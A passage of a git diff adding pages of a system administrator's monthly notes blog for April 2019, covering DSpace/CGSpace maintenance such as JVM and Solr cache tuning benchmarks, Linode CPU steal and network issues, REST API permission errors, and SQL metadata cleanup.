+    -XX:ConcGCThreads=4 -XX:ParallelGCThreads=4 \
+    -XX:+CMSScavengeBeforeRemark \
+    -XX:PretenureSizeThreshold=64m \
+    -XX:+UseCMSInitiatingOccupancyOnly \
+    -XX:CMSInitiatingOccupancyFraction=50 \
+    -XX:CMSMaxAbortablePrecleanTime=6000 \
+    -XX:+CMSParallelRemarkEnabled \
+    -XX:+ParallelRefProcEnabled&#34;
+</code></pre><ul>
+<li>I need to remember to check the Munin JVM graphs in a few days</li>
+<li>It might be placebo, but the site <em>does</em> feel snappier&hellip;</li>
+</ul>
+<h2 id="2019-04-15">2019-04-15</h2>
+<ul>
+<li>Rework the dspace-statistics-api to use the vanilla Python requests library instead of Solr client
+<ul>
+<li><a href="https://github.com/ilri/dspace-statistics-api/releases/tag/v1.0.0">Tag version 1.0.0</a> and deploy it on DSpace Test</li>
+</ul>
+</li>
+<li>Pretty annoying to see CGSpace (linode18) with 20–50% CPU steal according to <code>iostat 1 10</code>, though I haven&rsquo;t had any Linode alerts in a few days</li>
+<li>Abenet sent me a list of ILRI items that don&rsquo;t have CRPs added to them
+<ul>
+<li>The spreadsheet only had Handles (no IDs), so I&rsquo;m experimenting with using Python in OpenRefine to get the IDs</li>
+<li>I cloned the handle column and then did a transform to get the IDs from the CGSpace REST API:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>import json
+import re
+import urllib
+import urllib2
+
+handle = re.findall(&#39;[0-9]+/[0-9]+&#39;, value)
+
+url = &#39;https://cgspace.cgiar.org/rest/handle/&#39; + handle[0]
+req = urllib2.Request(url)
+req.add_header(&#39;User-agent&#39;, &#39;Alan Python bot&#39;)
+res = urllib2.urlopen(req)
+data = json.load(res)
+item_id = data[&#39;id&#39;]
+
+return item_id
+</code></pre><ul>
+<li>Luckily none of the items already had CRPs, so I didn&rsquo;t have to worry about them getting removed
+<ul>
+<li>It would have been much trickier if I had to get the CRPs for the items first, then add the CRPs&hellip;</li>
+</ul>
+</li>
+<li>I ran a full Discovery indexing on CGSpace because I didn&rsquo;t do it after all the metadata updates last week:</li>
+</ul>
+<pre tabindex="0"><code>$ time schedtool -B -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
+
+real    82m45.324s
+user    7m33.446s
+sys     2m13.463s
+</code></pre><h2 id="2019-04-16">2019-04-16</h2>
+<ul>
+<li>Export IITA&rsquo;s community from CGSpace because they want to experiment with importing it into their internal DSpace for some testing or something</li>
+</ul>
+<h2 id="2019-04-17">2019-04-17</h2>
+<ul>
+<li>Reading an interesting <a href="https://teaspoon-consulting.com/articles/solr-cache-tuning.html">blog post about Solr caching</a></li>
+<li>Did some tests of the dspace-statistics-api on my local DSpace instance with 28 million documents in a sharded statistics core (<code>statistics</code> and <code>statistics-2018</code>) and monitored the memory usage of Tomcat in VisualVM</li>
+<li>4GB heap, CMS GC, 512 filter cache, 512 query cache, with 28 million documents in two shards
+<ul>
+<li>Run 1:
+<ul>
+<li>Time: 3.11s user 0.44s system 0% cpu 13:45.07 total</li>
+<li>Tomcat (not Solr) max JVM heap usage: 2.04 GiB</li>
+</ul>
+</li>
+<li>Run 2:
+<ul>
+<li>Time: 3.23s user 0.43s system 0% cpu 13:46.10 total</li>
+<li>Tomcat (not Solr) max JVM heap usage: 2.06 GiB</li>
+</ul>
+</li>
+<li>Run 3:
+<ul>
+<li>Time: 3.23s user 0.42s system 0% cpu 13:14.70 total</li>
+<li>Tomcat (not Solr) max JVM heap usage: 2.13 GiB</li>
+<li><code>filterCache</code> size: 482, <code>cumulative_lookups</code>: 7062712, <code>cumulative_hits</code>: 167903, <code>cumulative_hitratio</code>: 0.02</li>
+<li>queryResultCache size: 2</li>
+</ul>
+</li>
+</ul>
+</li>
+<li>4GB heap, CMS GC, 1024 filter cache, 512 query cache, with 28 million documents in two shards
+<ul>
+<li>Run 1:
+<ul>
+<li>Time: 2.92s user 0.39s system 0% cpu 12:33.08 total</li>
+<li>Tomcat (not Solr) max JVM heap usage: 2.16 GiB</li>
+</ul>
+</li>
+<li>Run 2:
+<ul>
+<li>Time: 3.10s user 0.39s system 0% cpu 12:25.32 total</li>
+<li>Tomcat (not Solr) max JVM heap usage: 2.07 GiB</li>
+</ul>
+</li>
+<li>Run 3:
+<ul>
+<li>Time: 3.29s user 0.36s system 0% cpu 11:53.47 total</li>
+<li>Tomcat (not Solr) max JVM heap usage: 2.08 GiB</li>
+<li><code>filterCache</code> size: 951, <code>cumulative_lookups</code>: 7062712, <code>cumulative_hits</code>: 254379, <code>cumulative_hitratio</code>: 0.04</li>
+</ul>
+</li>
+</ul>
+</li>
+<li>4GB heap, CMS GC, 2048 filter cache, 512 query cache, with 28 million documents in two shards
+<ul>
+<li>Run 1:
+<ul>
+<li>Time: 2.90s user 0.48s system 0% cpu 10:37.31 total</li>
+<li>Tomcat max JVM heap usage: 1.96 GiB</li>
+<li><code>filterCache</code> size: 1901, <code>cumulative_lookups</code>: 2354237, <code>cumulative_hits</code>: 180111, <code>cumulative_hitratio</code>: 0.08</li>
+</ul>
+</li>
+<li>Run 2:
+<ul>
+<li>Time: 2.97s user 0.39s system 0% cpu 10:40.06 total</li>
+<li>Tomcat max JVM heap usage: 2.09 GiB</li>
+<li><code>filterCache</code> size: 1901, <code>cumulative_lookups</code>: 4708473, <code>cumulative_hits</code>: 360068, <code>cumulative_hitratio</code>: 0.08</li>
+</ul>
+</li>
+<li>Run 3:
+<ul>
+<li>Time: 3.28s user 0.37s system 0% cpu 10:49.56 total</li>
+<li>Tomcat max JVM heap usage: 2.05 GiB</li>
+<li><code>filterCache</code> size: 1901, <code>cumulative_lookups</code>: 7062712, <code>cumulative_hits</code>: 540020, <code>cumulative_hitratio</code>: 0.08</li>
+</ul>
+</li>
+</ul>
+</li>
+<li>4GB heap, CMS GC, 4096 filter cache, 512 query cache, with 28 million documents in two shards
+<ul>
+<li>Run 1:
+<ul>
+<li>Time: 2.88s user 0.35s system 0% cpu 8:29.55 total</li>
+<li>Tomcat max JVM heap usage: 2.15 GiB</li>
+<li><code>filterCache</code> size: 3770, <code>cumulative_lookups</code>: 2354237, <code>cumulative_hits</code>: 414512, <code>cumulative_hitratio</code>: 0.18</li>
+</ul>
+</li>
+<li>Run 2:
+<ul>
+<li>Time: 3.01s user 0.38s system 0% cpu 9:15.65 total</li>
+<li>Tomcat max JVM heap usage: 2.17 GiB</li>
+<li><code>filterCache</code> size: 3945, <code>cumulative_lookups</code>: 4708473, <code>cumulative_hits</code>: 829093, <code>cumulative_hitratio</code>: 0.18</li>
+</ul>
+</li>
+<li>Run 3:
+<ul>
+<li>Time: 3.01s user 0.40s system 0% cpu 9:01.31 total</li>
+<li>Tomcat max JVM heap usage: 2.07 GiB</li>
+<li><code>filterCache</code> size: 3770, <code>cumulative_lookups</code>: 7062712, <code>cumulative_hits</code>: 1243632, <code>cumulative_hitratio</code>: 0.18</li>
+</ul>
+</li>
+</ul>
+</li>
+<li>The biggest takeaway I have is that this workload benefits from a larger <code>filterCache</code> (for Solr fq parameter), but barely uses the <code>queryResultCache</code> (for Solr q parameter) at all
+<ul>
+<li>The number of hits goes up and the time taken decreases when we increase the <code>filterCache</code>, and total JVM heap memory doesn&rsquo;t seem to increase much at all</li>
+<li>I guess the <code>queryResultCache</code> size is always 2 because I&rsquo;m only doing two queries: <code>type:0</code> and <code>type:2</code> (downloads and views, respectively)</li>
+</ul>
+</li>
+<li>Here is the general pattern of running three sequential indexing runs as seen in VisualVM while monitoring the Tomcat process:</li>
+</ul>
+<p><img src="/cgspace-notes/2019/04/visualvm-solr-indexing-4096-filterCache.png" alt="VisualVM Tomcat 4096 filterCache"></p>
+<ul>
+<li>I ran one test with a <code>filterCache</code> of 16384 to try to see if I could make the Tomcat JVM memory balloon, but actually it <em>drastically</em> increased the performance and memory usage of the dspace-statistics-api indexer</li>
+<li>4GB heap, CMS GC, 16384 filter cache, 512 query cache, with 28 million documents in two shards
+<ul>
+<li>Run 1:
+<ul>
+<li>Time: 2.85s user 0.42s system 2% cpu 2:28.92 total</li>
+<li>Tomcat max JVM heap usage: 1.90 GiB</li>
+<li><code>filterCache</code> size: 14851, <code>cumulative_lookups</code>: 2354237, <code>cumulative_hits</code>: 2331186, <code>cumulative_hitratio</code>: 0.99</li>
+</ul>
+</li>
+<li>Run 2:
+<ul>
+<li>Time: 2.90s user 0.37s system 2% cpu 2:23.50 total</li>
+<li>Tomcat max JVM heap usage: 1.27 GiB</li>
+<li><code>filterCache</code> size: 15834, <code>cumulative_lookups</code>: 4708476, <code>cumulative_hits</code>: 4664762, <code>cumulative_hitratio</code>: 0.99</li>
+</ul>
+</li>
+<li>Run 3:
+<ul>
+<li>Time: 2.93s user 0.39s system 2% cpu 2:26.17 total</li>
+<li>Tomcat max JVM heap usage: 1.05 GiB</li>
+<li><code>filterCache</code> size: 15248, <code>cumulative_lookups</code>: 7062715, <code>cumulative_hits</code>: 6998267, <code>cumulative_hitratio</code>: 0.99</li>
+</ul>
+</li>
+</ul>
+</li>
+<li>The JVM garbage collection graph is MUCH flatter, and memory usage is much lower (not to mention a drop in GC-related CPU usage)!</li>
+</ul>
+<p><img src="/cgspace-notes/2019/04/visualvm-solr-indexing-16384-filterCache.png" alt="VisualVM Tomcat 16384 filterCache"></p>
+<ul>
+<li>I will deploy this <code>filterCache</code> setting on DSpace Test (linode19)</li>
+<li>Run all system updates on DSpace Test (linode19) and reboot it</li>
+<li>Lots of CPU steal going on still on CGSpace (linode18):</li>
+</ul>
+<p><img src="/cgspace-notes/2019/04/cpu-week3.png" alt="CPU usage week"></p>
+<h2 id="2019-04-18">2019-04-18</h2>
+<ul>
+<li>I&rsquo;ve been trying to copy the <code>statistics-2018</code> Solr core from CGSpace to DSpace Test since yesterday, but the network speed is like 20KiB/sec
+<ul>
+<li>I opened a support ticket to ask Linode to investigate</li>
+<li>They asked me to send an <code>mtr</code> report from Fremont to Frankfurt and vice versa</li>
+</ul>
+</li>
+<li>Deploy Tomcat 7.0.94 on DSpace Test (linode19)
+<ul>
+<li>Also, I realized that the CMS GC changes I deployed a few days ago were ignored by Tomcat because of something with how Ansible formatted the options string</li>
+<li>I needed to use the &ldquo;folded&rdquo; YAML variable format <code>&gt;-</code> (with the dash so it doesn&rsquo;t add a return at the end)</li>
+</ul>
+</li>
+<li>UptimeRobot says that CGSpace went &ldquo;down&rdquo; this afternoon, but I looked at the CPU steal with <code>iostat 1 10</code> and it&rsquo;s in the 50s and 60s
+<ul>
+<li>The munin graph shows a lot of CPU steal (red) currently (and over all during the week):</li>
+</ul>
+</li>
+</ul>
+<p><img src="/cgspace-notes/2019/04/cpu-week4.png" alt="CPU usage week"></p>
+<ul>
+<li>I opened a ticket with Linode to migrate us somewhere
+<ul>
+<li>They agreed to migrate us to a quieter host</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-04-20">2019-04-20</h2>
+<ul>
+<li>Linode agreed to move CGSpace (linode18) to a new machine shortly after I filed my ticket about CPU steal two days ago and now the load is much more sane:</li>
+</ul>
+<p><img src="/cgspace-notes/2019/04/cpu-week5.png" alt="CPU usage week"></p>
+<ul>
+<li>For future reference, Linode mentioned that they consider CPU steal above 8% to be significant</li>
+<li>Regarding the other Linode issue about speed, I did a test with <code>iperf</code> between linode18 and linode19:</li>
+</ul>
+<pre tabindex="0"><code># iperf -s
+------------------------------------------------------------
+Server listening on TCP port 5001
+TCP window size: 85.3 KByte (default)
+------------------------------------------------------------
+[  4] local 45.79.x.x port 5001 connected with 139.162.x.x port 51378
+------------------------------------------------------------
+Client connecting to 139.162.x.x, TCP port 5001
+TCP window size: 85.0 KByte (default)
+------------------------------------------------------------
+[  5] local 45.79.x.x port 36440 connected with 139.162.x.x port 5001
+[ ID] Interval       Transfer     Bandwidth
+[  5]  0.0-10.2 sec   172 MBytes   142 Mbits/sec
+[  4]  0.0-10.5 sec   202 MBytes   162 Mbits/sec
+</code></pre><ul>
+<li>Even with the software firewalls disabled the rsync speed was low, so it&rsquo;s not a rate limiting issue</li>
+<li>I also tried to download a file over HTTPS from CGSpace to DSpace Test, but it was capped at 20KiB/sec
+<ul>
+<li>I updated the Linode issue with this information</li>
+</ul>
+</li>
+<li>I&rsquo;m going to try to switch the kernel to the latest upstream (5.0.8) instead of Linode&rsquo;s latest x86_64
+<ul>
+<li>Nope, still 20KiB/sec</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-04-21">2019-04-21</h2>
+<ul>
+<li>Deploy Solr 4.10.4 on CGSpace (linode18)</li>
+<li>Deploy Tomcat 7.0.94 on CGSpace</li>
+<li>Deploy dspace-statistics-api v1.0.0 on CGSpace</li>
+<li>Linode support replicated the results I had from the network speed testing and said they don&rsquo;t know why it&rsquo;s so slow
+<ul>
+<li>They offered to live migrate the instance to another host to see if that helps</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-04-22">2019-04-22</h2>
+<ul>
+<li>Abenet pointed out <a href="https://hdl.handle.net/10568/97912">an item</a> that doesn&rsquo;t have an Altmetric score on CGSpace, but has a score of 343 in the CGSpace Altmetric dashboard
+<ul>
+<li>I tweeted the Handle to see if it will pick it up&hellip;</li>
+<li>Like clockwork, after fifteen minutes there was a donut showing on CGSpace</li>
+</ul>
+</li>
+<li>I want to get rid of this annoying warning that is constantly in our DSpace logs:</li>
+</ul>
+<pre tabindex="0"><code>2019-04-08 19:02:31,770 WARN  org.dspace.xoai.services.impl.xoai.DSpaceRepositoryConfiguration @ { OAI 2.0 :: DSpace } Not able to retrieve the dspace.oai.url property from oai.cfg. Falling back to request address
+</code></pre><ul>
+<li>Apparently it happens once per request, which can be at least 1,500 times per day according to the DSpace logs on CGSpace (linode18):</li>
+</ul>
+<pre tabindex="0"><code>$ grep -c &#39;Falling back to request address&#39; dspace.log.2019-04-20
+dspace.log.2019-04-20:1515
+</code></pre><ul>
+<li>I will fix it in <code>dspace/config/modules/oai.cfg</code></li>
+<li>Linode says that it is likely that the host CGSpace (linode18) is on is showing signs of hardware failure and they recommended that I migrate the VM to a new host
+<ul>
+<li>I told them to migrate it at 04:00:00AM Frankfurt time, when nobody in East Africa, Europe, or South America should be using the server</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-04-23">2019-04-23</h2>
+<ul>
+<li>One blog post says that there is <a href="https://kvaes.wordpress.com/2017/07/01/what-azure-virtual-machine-size-should-i-pick/">no overprovisioning in Azure</a>:</li>
+</ul>
+<!-- raw HTML omitted -->
+<ul>
+<li>Perhaps that&rsquo;s why the <a href="https://azure.microsoft.com/en-us/pricing/details/virtual-machines/linux/">Azure pricing</a> is so expensive!</li>
+<li>Add a privacy page to CGSpace
+<ul>
+<li>The work was mostly similar to the About page at <code>/page/about</code>, but in addition to adding i18n strings etc, I had to add the logic for the trail to <code>dspace-xmlui-mirage2/src/main/webapp/xsl/preprocess/general.xsl</code></li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-04-24">2019-04-24</h2>
+<ul>
+<li>Linode migrated CGSpace (linode18) to a new host, but I am still getting poor performance when copying data to DSpace Test (linode19)
+<ul>
+<li>I asked them if we can migrate DSpace Test to a new host</li>
+<li>They migrated DSpace Test to a new host and the rsync speed from Frankfurt was still capped at 20KiB/sec&hellip;</li>
+<li>I booted DSpace Test to a rescue CD and tried the rsync from CGSpace there too, but it was still capped at 20KiB/sec&hellip;</li>
+<li>I copied the 18GB <code>statistics-2018</code> Solr core from Frankfurt to a Linode in London at 15MiB/sec, then from the London one to DSpace Test in Fremont at 15MiB/sec&hellip; so WTF us up with Frankfurt→Fremont?!</li>
+</ul>
+</li>
+<li>Finally upload the 218 IITA items from March to CGSpace
+<ul>
+<li>Abenet and I had to do a little bit more work to correct the metadata of one item that appeared to be a duplicate, but really just had the wrong DOI</li>
+</ul>
+</li>
+<li>While I was uploading the IITA records I noticed that twenty of the records Sisay uploaded in 2018-09 had double Handles (<code>dc.identifier.uri</code>)
+<ul>
+<li>According to my notes in 2018-09 I had noticed this when he uploaded the records and told him to remove them, but he didn&rsquo;t&hellip;</li>
+<li>I exported the IITA community as a CSV then used <code>csvcut</code> to extract the two URI columns and identify and fix the records:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ csvcut -c id,dc.identifier.uri,&#39;dc.identifier.uri[]&#39; ~/Downloads/2019-04-24-IITA.csv &gt; /tmp/iita.csv
+</code></pre><ul>
+<li>Carlos Tejo from the Land Portal had been emailing me this week to ask about the old REST API that Tsega was building in 2017
+<ul>
+<li>I told him we never finished it, and that he should try to use the <code>/items/find-by-metadata-field</code> endpoint, with the caveat that you need to match the language attribute exactly (ie &ldquo;en&rdquo;, &ldquo;en_US&rdquo;, null, etc)</li>
+<li>I asked him how many terms they are interested in, as we could probably make it easier by normalizing the language attributes of these fields (it would help us anyways)</li>
+<li>He says he&rsquo;s getting HTTP 401 errors when trying to search for CPWF subject terms, which I can reproduce:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ curl -f -H &#34;accept: application/json&#34; -H &#34;Content-Type: application/json&#34; -X POST &#34;https://dspacetest.cgiar.org/rest/items/find-by-metadata-field&#34; -d &#39;{&#34;key&#34;:&#34;cg.subject.cpwf&#34;, &#34;value&#34;:&#34;WATER MANAGEMENT&#34;,&#34;language&#34;: &#34;en_US&#34;}&#39;
+curl: (22) The requested URL returned error: 401
+</code></pre><ul>
+<li>Note that curl only shows the HTTP 401 error if you use <code>-f</code> (fail), and only then if you <em>don&rsquo;t</em> include <code>-s</code>
+<ul>
+<li>I see there are about 1,000 items using CPWF subject &ldquo;WATER MANAGEMENT&rdquo; in the database, so there should definitely be results</li>
+<li>The breakdown of <code>text_lang</code> fields used in those items is 942:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value=&#39;WATER MANAGEMENT&#39; AND text_lang=&#39;en_US&#39;;
+ count 
+-------
+   376
+(1 row)
+
+dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value=&#39;WATER MANAGEMENT&#39; AND text_lang=&#39;&#39;;
+ count 
+-------
+   149
+(1 row)
+
+dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value=&#39;WATER MANAGEMENT&#39; AND text_lang IS NULL;
+ count 
+-------
+   417
+(1 row)
+</code></pre><ul>
+<li>I see that the HTTP 401 issue seems to be a bug due to an item that the user doesn&rsquo;t have permission to access&hellip; from the DSpace log:</li>
+</ul>
+<pre tabindex="0"><code>2019-04-24 08:11:51,129 INFO  org.dspace.rest.ItemsResource @ Looking for item with metadata(key=cg.subject.cpwf,value=WATER MANAGEMENT, language=en_US).
+2019-04-24 08:11:51,231 INFO  org.dspace.usage.LoggerUsageEventListener @ anonymous::view_item:handle=10568/72448
+2019-04-24 08:11:51,238 INFO  org.dspace.usage.LoggerUsageEventListener @ anonymous::view_item:handle=10568/72491
+2019-04-24 08:11:51,243 INFO  org.dspace.usage.LoggerUsageEventListener @ anonymous::view_item:handle=10568/75703
+2019-04-24 08:11:51,252 ERROR org.dspace.rest.ItemsResource @ User(anonymous) has not permission to read item!
+</code></pre><ul>
+<li>Nevertheless, if I request using the <code>null</code> language I get 1020 results, plus 179 for a blank language attribute:</li>
+</ul>
+<pre tabindex="0"><code>$ curl -s -H &#34;Content-Type: application/json&#34; -X POST &#34;https://dspacetest.cgiar.org/rest/items/find-by-metadata-field&#34; -d &#39;{&#34;key&#34;:&#34;cg.subject.cpwf&#34;, &#34;value&#34;:&#34;WATER MANAGEMENT&#34;,&#34;language&#34;: null}&#39; | jq length
+1020
+$ curl -s -H &#34;Content-Type: application/json&#34; -X POST &#34;https://dspacetest.cgiar.org/rest/items/find-by-metadata-field&#34; -d &#39;{&#34;key&#34;:&#34;cg.subject.cpwf&#34;, &#34;value&#34;:&#34;WATER MANAGEMENT&#34;,&#34;language&#34;: &#34;&#34;}&#39; | jq length
+179
+</code></pre><ul>
+<li>This is weird because I see 942–1156 items with &ldquo;WATER MANAGEMENT&rdquo; (depending on wildcard matching for errors in subject spelling):</li>
+</ul>
+<pre tabindex="0"><code>dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value=&#39;WATER MANAGEMENT&#39;;
+ count 
+-------
+   942
+(1 row)
+
+dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value LIKE &#39;%WATER MANAGEMENT%&#39;;
+ count 
+-------
+  1156
+(1 row)
+</code></pre><ul>
+<li>I sent a message to the dspace-tech mailing list to ask for help</li>
+</ul>
+<h2 id="2019-04-25">2019-04-25</h2>
+<ul>
+<li>Peter pointed out that we need to remove Delicious and Google+ from our social sharing links
+<ul>
+<li>Also, it would be nice if we could include the item title in the shared link</li>
+<li>I created an issue on GitHub to track this (<a href="https://github.com/ilri/DSpace/issues/419">#419</a>)</li>
+</ul>
+</li>
+<li>I tested the REST API after logging in with my super admin account and I was able to get results for the problematic query:</li>
+</ul>
+<pre tabindex="0"><code>$ curl -f -H &#34;Content-Type: application/json&#34; -X POST &#34;https://dspacetest.cgiar.org/rest/login&#34; -d &#39;{&#34;email&#34;:&#34;example@me.com&#34;,&#34;password&#34;:&#34;fuuuuu&#34;}&#39;
+$ curl -f -H &#34;Content-Type: application/json&#34; -H &#34;rest-dspace-token: b43d41a6-5ac1-455d-b49a-616b8debc25b&#34; -X GET &#34;https://dspacetest.cgiar.org/rest/status&#34;
+$ curl -f -H &#34;rest-dspace-token: b43d41a6-5ac1-455d-b49a-616b8debc25b&#34; -H &#34;Content-Type: application/json&#34; -X POST &#34;https://dspacetest.cgiar.org/rest/items/find-by-metadata-field&#34; -d &#39;{&#34;key&#34;:&#34;cg.subject.cpwf&#34;, &#34;value&#34;:&#34;WATER MANAGEMENT&#34;,&#34;language&#34;: &#34;en_US&#34;}&#39;
+</code></pre><ul>
+<li>I created a normal user for Carlos to try as an unprivileged user:</li>
+</ul>
+<pre tabindex="0"><code>$ dspace user --add --givenname Carlos --surname Tejo --email blah@blah.com --password &#39;ddmmdd&#39;
+</code></pre><ul>
+<li>But still I get the HTTP 401 and I have no idea which item is causing it</li>
+<li>I enabled more verbose logging in <code>ItemsResource.java</code> and now I can at least see the item ID that causes the failure&hellip;
+<ul>
+<li>The item is not even in the archive, but somehow it is discoverable</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>dspace=# SELECT * FROM item WHERE item_id=74648;
+ item_id | submitter_id | in_archive | withdrawn |       last_modified        | owning_collection | discoverable
+---------+--------------+------------+-----------+----------------------------+-------------------+--------------
+   74648 |          113 | f          | f         | 2016-03-30 09:00:52.131+00 |                   | t
+(1 row)
+</code></pre><ul>
+<li>I tried to delete the item in the web interface, and it seems successful, but I can still access the item in the admin interface, and nothing changes in PostgreSQL</li>
+<li>Meet with CodeObia to see progress on AReS version 2</li>
+<li>Marissa Van Epp asked me to add a few new metadata values to their Phase II Project Tags field (cg.identifier.ccafsprojectpii)
+<ul>
+<li>I created a <a href="https://github.com/ilri/DSpace/pull/420">pull request</a> for it and will do it the next time I run updates on CGSpace</li>
+</ul>
+</li>
+<li>Communicate with Carlos Tejo from the Land Portal about the <code>/items/find-by-metadata-value</code> endpoint</li>
+<li>Run all system updates on DSpace Test (linode19) and reboot it</li>
+</ul>
+<h2 id="2019-04-26">2019-04-26</h2>
+<ul>
+<li>Export a list of authors for Peter to look through:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/2019-04-26-all-authors.csv with csv header;
+COPY 65752
+</code></pre><h2 id="2019-04-28">2019-04-28</h2>
+<ul>
+<li>Still trying to figure out the issue with the items that cause the REST API&rsquo;s <code>/items/find-by-metadata-value</code> endpoint to throw an exception
+<ul>
+<li>I made the item private in the UI and then I see in the UI and PostgreSQL that it is no longer discoverable:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>dspace=# SELECT * FROM item WHERE item_id=74648;
+ item_id | submitter_id | in_archive | withdrawn |       last_modified        | owning_collection | discoverable 
+---------+--------------+------------+-----------+----------------------------+-------------------+--------------
+   74648 |          113 | f          | f         | 2019-04-28 08:48:52.114-07 |                   | f
+(1 row)
+</code></pre><ul>
+<li>And I tried the <code>curl</code> command from above again, but I still get the HTTP 401 and and the same error in the DSpace log:</li>
+</ul>
+<pre tabindex="0"><code>2019-04-28 08:53:07,170 ERROR org.dspace.rest.ItemsResource @ User(anonymous) has not permission to read item(id=74648)!
+</code></pre><ul>
+<li>I even tried to &ldquo;expunge&rdquo; the item using an <a href="https://wiki.lyrasis.org/display/DSDOC5x/Batch+Metadata+Editing#BatchMetadataEditing-Performing'actions'onitems">action in CSV</a>, and it said &ldquo;EXPUNGED!&rdquo; but the item is still there&hellip;</li>
+</ul>
+<h2 id="2019-04-30">2019-04-30</h2>
+<ul>
+<li>Send mail to the dspace-tech mailing list to ask about the item expunge issue</li>
+<li>Delete and re-create Podman container for dspacedb after pulling a new PostgreSQL container:</li>
+</ul>
+<pre tabindex="0"><code>$ podman run --name dspacedb -v dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine
+</code></pre><ul>
+<li>Carlos from LandPortal asked if I could export CGSpace in a machine-readable format so I think I&rsquo;ll try to do a CSV
+<ul>
+<li>In order to make it easier for him to understand the CSV I will normalize the text languages (minus the provenance field) on my local development instance before exporting:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>dspace=# SELECT DISTINCT text_lang, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id != 28 GROUP BY text_lang;
+ text_lang |  count
+-----------+---------
+           |  358647
+ *         |      11
+ E.        |       1
+ en        |    1635
+ en_US     |  602312
+ es        |      12
+ es_ES     |       2
+ ethnob    |       1
+ fr        |       2
+ spa       |       2
+           | 1074345
+(11 rows)
+dspace=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN (&#39;ethnob&#39;, &#39;en&#39;, &#39;*&#39;, &#39;E.&#39;, &#39;&#39;);
+UPDATE 360295
+dspace=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IS NULL;
+UPDATE 1074345
+dspace=# UPDATE metadatavalue SET text_lang=&#39;es_ES&#39; WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN (&#39;es&#39;, &#39;spa&#39;);
+UPDATE 14
+</code></pre><ul>
+<li>Then I exported the whole repository as CSV, imported it into OpenRefine, removed a few unneeded columns, exported it, zipped it down to 36MB, and emailed a link to Carlos</li>
+<li>In other news, while I was looking through the CSV in OpenRefine I saw lots of weird values in some fields&hellip; we should check, for example:
+<ul>
+<li>issue dates</li>
+<li>items missing handles</li>
+<li>authorship types</li>
+</ul>
+</li>
+</ul>
+<!-- raw HTML omitted -->
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2019-05/index.html b/docs/2019-05/index.html
new file mode 100644
index 000000000..64e65931c
--- /dev/null
+++ b/docs/2019-05/index.html
@@ -0,0 +1,685 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="May, 2019" />
+<meta property="og:description" content="2019-05-01
+
+Help CCAFS with regenerating some item thumbnails after they uploaded new PDFs to some items on CGSpace
+A user on the dspace-tech mailing list offered some suggestions for troubleshooting the problem with the inability to delete certain items
+
+Apparently if the item is in the workflowitem table it is submitted to a workflow
+And if it is in the workspaceitem table it is in the pre-submitted state
+
+
+The item seems to be in a pre-submitted state, so I tried to delete it from there:
+
+dspace=# DELETE FROM workspaceitem WHERE item_id=74648;
+DELETE 1
+
+But after this I tried to delete the item from the XMLUI and it is still present&hellip;
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2019-05/" />
